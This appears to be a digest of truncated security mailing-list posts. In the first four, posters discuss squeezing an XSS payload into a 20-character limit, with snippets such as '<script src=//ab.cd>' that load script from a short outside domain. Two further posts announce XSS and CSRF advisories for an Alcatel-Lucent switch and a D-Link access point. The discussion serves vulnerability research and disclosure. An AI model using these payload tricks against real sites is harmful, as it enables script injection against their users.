Posted by Mark Steward on Dec 03

I’ve spotted this before and ignored it because it’s all HTML-escaped. You
can actually put as much as you like before the equals, presumably
including script tags. You can also include enough after the equals to
write something like “<iframe src=//xy.co>”.

Where are you seeing it unescaped? Is it some third-party handler? Try on a
clean install with just an empty .aspx and a web.config with an empty
configuration…

Posted by James Hooker on Dec 03

You could skip the schema on any includes, and just use ‘//’. That will
then use the schema provided in the original URL. That will save you 4
characters at least. You can also skip most quotes in tags – that will save
you a few more characters. Link shortening services might also be of use,
however one that generates links short enough might be hard to come by –
more likely, you’ll need a 3 character domain, with a 2 character…

Posted by A Z on Dec 03

Thank you all for the replies,

Unfortunately, I can no longer really test this (it was on some internal
network, so for example link shortening wouldn’t work), but I wanted to
know if anyone had encountered this stuff before. I should try on a clean
install as suggested – if it works I’ll let you know.

For some unknown reason there was no HTML encoding in this error response,
however the payload was truncated to 20 chars. I googled it…

Posted by waysea on Dec 03

If you can get a <script> tag in (usually the very first tag to be
blacklisted), you could
1. register a two character domain with a two character TLD (all the
single character domains with two letter TLDs had been taken the last
time I checked)
2. have the root page be an index.js file (instead of index.html)
3. use something like:

A) <script src=//ab.cd>
or
B) <script/src=//ef.gh>

Without knowing more about your specific…

Posted by Stephan.Rickauer on Dec 03

#############################################################
#
# SWISSCOM CSIRT ADVISORY – http://www.swisscom.com/security
#
#############################################################
#
# CVE ID: CVE-2014-3809
# Product: 1830 Photonic Service Switch PSS-32/16/4
# Vendor: Alcatel-Lucent
# Subject: Reflected Cross-site Scripting – XSS
# Effect: Remotely exploitable
# Author: Stephan Rickauer (stephan.rickauer _at_ swisscom.com)
#…

Posted by MustLive on Dec 03

Hello list!

There are Cross-Site Request Forgery and Cross-Site Scripting
vulnerabilities in D-Link DAP-1360 (Wi-Fi Access Point and Router).

In addition to previous Abuse of Functionality, Brute Force, Information
Leakage, Cross-Site Request Forgery and Cross-Site Scripting vulnerabilities
in DAP-1360, which I wrote about earlier.

————————-
Affected products:
————————-

Vulnerable is the next model: D-Link…